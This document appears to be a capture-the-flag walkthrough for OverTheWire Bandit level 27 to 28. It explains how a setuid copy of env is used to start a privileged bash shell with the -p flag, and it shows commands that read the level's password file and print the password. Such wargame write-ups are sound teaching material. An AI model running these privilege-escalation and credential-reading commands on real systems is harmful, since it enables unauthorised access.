../
OverTheWire - Bandit: Level 27 to Level 28
Good job getting a shell! Now hurry and grab the password for bandit27!
Using the shell created in the previous level, we can find a executable with the suid
-bit set.
1 -rwsr-x--- 1 bandit27 bandit26 14876 Oct 5 06:19 bandit27-do
Let’s take a look at the usage of this executable:
1 $ ./bandit27-do --help
2 Usage: env [OPTION]... [-] [NAME=VALUE]... [COMMAND [ARG]...]
3 Set each NAME to VALUE in the environment and run COMMAND.
4
5 Mandatory arguments to long options are mandatory for short options too.
6 -i, --ignore-environment start with an empty environment
7 -0, --null end each output line with NUL, not newline
8 -u, --unset=NAME remove variable from the environment
9 -C, --chdir=DIR change working directory to DIR
10 -S, --split-string=S process and split S into separate arguments;
11 used to pass multiple arguments on shebang lines
12 --block-signal[=SIG] block delivery of SIG signal(s) to COMMAND
13 --default-signal[=SIG] reset handling of SIG signal(s) to the default
14 --ignore-signal[=SIG] set handling of SIG signals(s) to do nothing
15 --list-signal-handling list non default signal handling to stderr
16 -v, --debug print verbose information for each processing step
17 --help display this help and exit
18 --version output version information and exit
19
20 A mere - implies -i. If no COMMAND, print the resulting environment.
21
22 SIG may be a signal name like 'PIPE', or a signal number like '13'.
23 Without SIG, all known signals are included. Multiple signals can be
24 comma-separated.
25
26 GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
27 Full documentation <https://www.gnu.org/software/coreutils/env>
28 or available locally via: info '(coreutils) env invocation'
The first line implies, this is a version of the /usr/bin/env
executable. A tool to run a command with a modified environment. This can be used to gain access to a bash shell as bandit27
.
1 $ ./bandit27-do /bin/bash -p
2 $ whoami
3 bandit27
4 $ cat /etc/bandit_pass/bandit27
5 YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
Be aware of the -p
flag used to call bash. This is needed, so bash
does not drop elevated privileges.